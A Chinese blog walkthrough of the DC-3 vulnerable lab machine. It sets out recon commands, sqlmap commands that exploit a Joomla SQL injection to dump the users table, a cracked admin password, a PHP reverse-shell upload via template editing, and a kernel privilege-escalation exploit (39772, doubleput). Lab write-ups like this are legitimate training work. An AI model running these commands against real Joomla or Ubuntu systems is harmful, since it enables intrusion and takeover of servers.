靶机 DC-3

环境准备

DC-3靶机链接:百度网盘 请输入提取码

提取码:pz03

虚拟主机网络连接模式:桥接模式

攻击机系统:Kali Linux2021.1

信息收集

1:使用以命令进行主机探测

ar-scan -l

2:对其主机进行详细的扫描发现只开放了80端口

nmap -sC -sV -p 1-65535 192.168.166.132

3:这里使用Joomscan扫描器来进行敏感信息收集

项目地址:https://github.com/OWASP/joomscan

直接用命令:git clone https://github.com/rezasp/joomscan.git

使用命令:joomscan --url http://192.168.166.132

4:发现Joomla版本号与后台管理地址,使用searchsploit查看是否有可以使用的EXP

5:可以看到有一个SQL注入漏洞,并使用以下命令查看详细信息

searchsploit -x php/webapps/42033.txt

漏洞利用

1:根据以上提示可以对其进行SQL注入

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump

2:使用john对其HASH进行破解

3:得出admin账户密码 扫描出来的登录界面

4:登录http://192.168.166.132/administrator/

用户名:admin 密码:snoopy

5:按照图片指示操作

:

6:并通过编辑模板来获取shell,写php-reverse-shell.php木马 (百度即可获得)

权限提升

1: kali开启监听 ,拼接路径触发木马来反弹shell,查了一通,并没 有价值信息。

2:这次查看系统版本,看有没有内核漏洞

cat /etc/*release

3:使用searchsploit搜索主机Ubuntu 16.04  有关提权漏洞

4:找到一个39772.txt ,查看他的位置

5:cat /usr/share/exploitdb/exploits/linux/local/39772.txt 用cat命令查看后,这边提供了操作方法还有利用工具的下载方法(一时感叹kali真屌!!)

6: 把靶机目录切换到/tmp目录下,进行下载39772.zip

7::再次我们使用39772进行提权,用unzip 解压39772.zip , 打开后发现俩个文件

tar -xvf exploit.tar //解压

./compile.sh

./doubleput

按照第五步的截图做就OK ,最后也是轻松拿下!!!

  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值